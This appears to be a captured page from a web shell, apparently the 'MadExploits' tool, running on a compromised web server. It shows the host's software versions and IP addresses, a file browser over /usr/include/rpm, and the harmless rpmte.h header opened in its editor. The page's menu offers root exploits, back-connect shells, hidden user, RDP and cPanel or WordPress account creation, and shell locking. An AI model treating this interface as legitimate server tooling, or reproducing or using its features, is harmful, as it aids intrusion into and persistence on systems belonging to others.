Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
argv.h
4.11
KB
-rw-r--r--
header.h
13.37
KB
-rw-r--r--
rpmbase64.h
1023
B
-rw-r--r--
rpmbuild.h
3.28
KB
-rw-r--r--
rpmcallback.h
1.38
KB
-rw-r--r--
rpmcli.h
12.45
KB
-rw-r--r--
rpmdb.h
6.15
KB
-rw-r--r--
rpmds.h
11.61
KB
-rw-r--r--
rpmfc.h
2.44
KB
-rw-r--r--
rpmfi.h
13.02
KB
-rw-r--r--
rpmfileutil.h
5.04
KB
-rw-r--r--
rpmio.h
2.21
KB
-rw-r--r--
rpmkeyring.h
2.59
KB
-rw-r--r--
rpmlegacy.h
7.5
KB
-rw-r--r--
rpmlib.h
5.34
KB
-rw-r--r--
rpmlog.h
8.48
KB
-rw-r--r--
rpmmacro.h
4.21
KB
-rw-r--r--
rpmpgp.h
46.34
KB
-rw-r--r--
rpmpol.h
388
B
-rw-r--r--
rpmprob.h
4.67
KB
-rw-r--r--
rpmps.h
2.29
KB
-rw-r--r--
rpmsign.h
740
B
-rw-r--r--
rpmspec.h
2.21
KB
-rw-r--r--
rpmsq.h
1.34
KB
-rw-r--r--
rpmstring.h
4.08
KB
-rw-r--r--
rpmstrpool.h
3.83
KB
-rw-r--r--
rpmsw.h
2.09
KB
-rw-r--r--
rpmtag.h
20.22
KB
-rw-r--r--
rpmtd.h
12.21
KB
-rw-r--r--
rpmte.h
6.45
KB
-rw-r--r--
rpmts.h
16.8
KB
-rw-r--r--
rpmtypes.h
2.49
KB
-rw-r--r--
rpmurl.h
1.11
KB
-rw-r--r--
rpmutil.h
4.68
KB
-rw-r--r--
rpmvf.h
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpmte.h
#ifndef H_RPMTE #define H_RPMTE /** \ingroup rpmts rpmte * \file lib/rpmte.h * Structures used for an "rpmte" transaction element. */ #include <rpm/rpmtypes.h> #include <rpm/argv.h> #ifdef __cplusplus extern "C" { #endif /** \ingroup rpmte * Transaction element type. */ typedef enum rpmElementType_e { TR_ADDED = (1 << 0), /*!< Package will be installed. */ TR_REMOVED = (1 << 1) /*!< Package will be removed. */ } rpmElementType; typedef rpmFlags rpmElementTypes; /** \ingroup rpmte * Retrieve header from transaction element. * @param te transaction element * @return header (new reference) */ Header rpmteHeader(rpmte te); /** \ingroup rpmte * Save header into transaction element. * @param te transaction element * @param h header * @return NULL always */ Header rpmteSetHeader(rpmte te, Header h); /** \ingroup rpmte * Retrieve type of transaction element. * @param te transaction element * @return type */ rpmElementType rpmteType(rpmte te); /** \ingroup rpmte * Retrieve name string of transaction element. * @param te transaction element * @return name string */ const char * rpmteN(rpmte te); /** \ingroup rpmte * Retrieve epoch string of transaction element. * @param te transaction element * @return epoch string */ const char * rpmteE(rpmte te); /** \ingroup rpmte * Retrieve version string of transaction element. * @param te transaction element * @return version string */ const char * rpmteV(rpmte te); /** \ingroup rpmte * Retrieve release string of transaction element. * @param te transaction element * @return release string */ const char * rpmteR(rpmte te); /** \ingroup rpmte * Retrieve arch string of transaction element. * @param te transaction element * @return arch string */ const char * rpmteA(rpmte te); /** \ingroup rpmte * Retrieve os string of transaction element. * @param te transaction element * @return os string */ const char * rpmteO(rpmte te); /** \ingroup rpmte * Retrieve isSource attribute of transaction element. * @param te transaction element * @return isSource attribute */ int rpmteIsSource(rpmte te); /** \ingroup rpmte * Retrieve color bits of transaction element. * @param te transaction element * @return color bits */ rpm_color_t rpmteColor(rpmte te); /** \ingroup rpmte * Set color bits of transaction element. * @param te transaction element * @param color new color bits * @return previous color bits */ rpm_color_t rpmteSetColor(rpmte te, rpm_color_t color); /** \ingroup rpmte * Retrieve last instance installed to the database. * @param te transaction element * @return last install instance. */ unsigned int rpmteDBInstance(rpmte te); /** \ingroup rpmte * Set last instance installed to the database. * @param te transaction element * @param instance Database instance of last install element. * @return last install instance. */ void rpmteSetDBInstance(rpmte te, unsigned int instance); /** \ingroup rpmte * Retrieve size in bytes of package file. * @todo Signature header is estimated at 256b. * @param te transaction element * @return size in bytes of package file. */ rpm_loff_t rpmtePkgFileSize(rpmte te); /** \ingroup rpmte * Retrieve parent transaction element. * @param te transaction element * @return parent transaction element */ rpmte rpmteParent(rpmte te); /** \ingroup rpmte * Set parent transaction element. * @param te transaction element * @param pte new parent transaction element * @return previous parent transaction element */ rpmte rpmteSetParent(rpmte te, rpmte pte); /** \ingroup rpmte * Return problem set info of transaction element. * @param te transaction element * @return problem set (or NULL if none) */ rpmps rpmteProblems(rpmte te); /** \ingroup rpmte * Destroy problem set info of transaction element. * @param te transaction element */ void rpmteCleanProblems(rpmte te); /** \ingroup rpmte * Destroy dependency set info of transaction element. * @param te transaction element */ void rpmteCleanDS(rpmte te); /** \ingroup rpmte * Set dependent element of TR_REMOVED transaction element. * @param te transaction element * @param depends dependent transaction element */ void rpmteSetDependsOn(rpmte te, rpmte depends); /** \ingroup rpmte * Retrieve dependent element of TR_REMOVED transaction element. * @param te transaction element * @return dependent transaction element */ rpmte rpmteDependsOn(rpmte te); /** \ingroup rpmte * Retrieve rpmdb instance of TR_REMOVED transaction element. * @param te transaction element * @return rpmdb instance */ int rpmteDBOffset(rpmte te); /** \ingroup rpmte * Retrieve [epoch:]version-release string from transaction element. * @param te transaction element * @return [epoch:]version-release string */ const char * rpmteEVR(rpmte te); /** \ingroup rpmte * Retrieve name-[epoch:]version-release string from transaction element. * @param te transaction element * @return name-[epoch:]version-release string */ const char * rpmteNEVR(rpmte te); /** \ingroup rpmte * Retrieve name-[epoch:]version-release.arch string from transaction element. * @param te transaction element * @return name-[epoch:]version-release.arch string */ const char * rpmteNEVRA(rpmte te); /** \ingroup rpmte * Retrieve key from transaction element. * @param te transaction element * @return key */ fnpyKey rpmteKey(rpmte te); /** \ingroup rpmte * Return failure status of transaction element. * If the element itself failed, this is 1, larger count means one of * it's parents failed. * @param te transaction element * @return number of failures for this transaction element */ int rpmteFailed(rpmte te); /** \ingroup rpmte * Retrieve dependency tag set from transaction element. * @param te transaction element * @param tag dependency tag * @return dependency tag set */ rpmds rpmteDS(rpmte te, rpmTagVal tag); /** \ingroup rpmte * Retrieve file info tag set from transaction element. * @param te transaction element * @return file info tag set */ rpmfi rpmteFI(rpmte te); /** \ingroup rpmte * Retrieve list of collections * @param te transaction element * @return list of collections */ ARGV_const_t rpmteCollections(rpmte te); /** \ingroup rpmte * Determine a transaction element is part of a collection * @param te transaction element * @param collname collection name * @return 1 if collname is part of a collection, 0 if not */ int rpmteHasCollection(rpmte te, const char * collname); #ifdef __cplusplus } #endif #endif /* H_RPMTE */
Close